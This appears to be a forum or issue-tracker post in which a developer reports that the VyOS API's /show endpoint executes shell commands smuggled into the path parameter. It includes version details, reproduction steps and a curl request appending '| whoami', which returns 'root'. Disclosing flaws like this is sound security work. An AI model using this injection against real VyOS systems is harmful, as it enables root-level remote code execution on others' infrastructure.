Hi all,
I am a developer recently assigned to use VyOS for a service running on our cloud infrastructure.
While testing the built-in API for external integration, I accidentally noticed that certain API requests could execute operating system commands on the VyOS system. At first, I was unsure whether this behavior was intended or a bug, so I performed additional tests.
Based on the results, I am reporting this behavior to ask for clarification on whether this is an intended feature or a potential security vulnerability.
VyOS version
Version: VyOS 1.5-rolling-202512110917
Release train: current
Release flavor: qcow2
Architecture: x86_64
System type: KVM guest (OpenStack)
Summary
The built-in VyOS API allows authenticated users to inject shell commands via the path parameter when calling the /show endpoint. By appending shell metacharacters (such as |) to elements of the path array, arbitrary operating system commands are executed on the VyOS system with root privileges. This behavior enables authenticated remote code execution (RCE) and does not appear to be documented or intended.
Steps to reproduce
- Enable and expose the built-in VyOS API.
- Send an authenticated request to the /show endpoint.
- Inject a shell command into the last element of the path array using a shell metacharacter.
Example request:
curl -L 'https://<vyos-ip>/show' \ -F 'data={"op":"show","path":["interfaces","ethernet | whoami"]}' \ -F 'key="<api-key>"'
Result:
The injected command is executed on the VyOS system and its output is returned in the API response.
response:
{ "success": true, "data": "root\n", "error": null }
The same behavior can be used to read arbitrary files or execute other system commands.